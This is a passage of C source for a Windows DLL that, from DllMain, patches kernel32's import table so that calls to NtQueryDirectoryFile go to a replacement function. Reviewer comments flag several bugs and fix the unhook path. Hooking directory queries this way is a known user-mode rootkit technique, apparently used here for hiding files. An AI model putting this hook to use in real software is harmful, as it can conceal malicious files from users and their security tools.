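ptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size==0) {
        return FALSE;
    }
    /* NOTE(review): every (ULONG) cast of hModule/RVA arithmetic below truncates
     * pointers to 32 bits; this walker is only valid in a 32-bit process. */
    PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG)hModule+pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
    PIMAGE_THUNK_DATA ThunkData;
    while (ImportDescriptor->FirstThunk) {
        char* szDll = (char*)((ULONG)hModule+ImportDescriptor->Name);
        /* Walk the import descriptors looking for the one that imports ntdll.dll.
         * NOTE(review): stricmp returns int; this should read `!= 0`, not `!= NULL`. */
        if (stricmp(szDll,"ntdll.dll")!=NULL) {
            ImportDescriptor++;
            continue;
        }
        ThunkData = (PIMAGE_THUNK_DATA)((ULONG)hModule+ImportDescriptor->OriginalFirstThunk);
        int num = 1;
        while (ThunkData->u1.Function) {
            /* +2 skips the WORD Hint of IMAGE_IMPORT_BY_NAME to reach Name.
             * NOTE(review): no IMAGE_SNAP_BY_ORDINAL check; an ordinal import
             * would be dereferenced as if it were an RVA. */
            char* szFunc = (char*)((ULONG)hModule+ThunkData->u1.AddressOfData+2);
            if (stricmp(szFunc,"NtQueryDirectoryFile")==0) {
                /* Matching slot in the bound IAT (FirstThunk), same index as in the INT. */
                PDWORD pFunc = (DWORD*)((ULONG)hModule+(DWORD)ImportDescriptor->FirstThunk)+(num-1);
                if (flag) {
                    /* Hook: save the original IAT entry, then overwrite it with ours. */
                    ULONG pNewFunc = (ULONG)NewZwQueryDirectoryFile;
                    OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(*(ULONG*)pFunc);
                    DWORD dwWrite = 0;
                    WriteProcessMemory(GetCurrentProcess(),pFunc,&pNewFunc,sizeof(ULONG),&dwWrite);
                } else {
                    /* Unhook: write the saved original entry back. */
                    DWORD dwWrite = 0;
                    WriteProcessMemory(GetCurrentProcess(),pFunc,(DWORD*)(&OldZwQueryDirectoryFile),sizeof(ULONG),&dwWrite);
                }
                /* NOTE(review): WriteProcessMemory's return value is ignored, so a
                 * failed patch is still reported as TRUE to the caller. */
                return TRUE;
            }
            num++;
            ThunkData++;
        }
        ImportDescriptor++;
    }
    return FALSE;
}

/* Set only when HookQueryFile(TRUE) reported success; guards the unhook path. */
static BOOL g_bHooked = FALSE;

/*
 * DllMain: install the NtQueryDirectoryFile IAT hook when this DLL is mapped
 * into a process and remove it again when the DLL is unloaded.
 *
 * hModule    - this DLL's base address (unused here).
 * dwReason   - DLL_PROCESS_ATTACH / DLL_PROCESS_DETACH / thread notifications.
 * lpReserved - on DLL_PROCESS_DETACH, non-NULL means the process is
 *              terminating rather than the DLL being freed with FreeLibrary.
 *
 * Returns TRUE unconditionally: a hook that fails to install must not abort
 * the host process's load; it simply runs unhooked.
 *
 * Both notifications run under the loader lock, so nothing here may load
 * libraries or wait on other threads.
 */
BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        /* Remember whether the patch actually took. The unhook path writes
         * OldZwQueryDirectoryFile back into kernel32's IAT, and that global
         * only holds a valid address after a successful hook. */
        g_bHooked = HookQueryFile(TRUE);
        break;

    case DLL_PROCESS_DETACH:
        /* Restore the IAT only if we patched it; otherwise the original code
         * wrote the never-initialised OldZwQueryDirectoryFile into kernel32's
         * import slot and every later directory enumeration jumped to garbage.
         * When lpReserved is non-NULL the process is exiting and the image is
         * being torn down anyway, so there is nothing to restore. */
        if (g_bHooked && lpReserved == NULL) {
            HookQueryFile(FALSE);
            g_bHooked = FALSE;
        }
        break;

    default:
        /* Thread attach/detach: nothing to do. */
        break;
    }
    return TRUE;
}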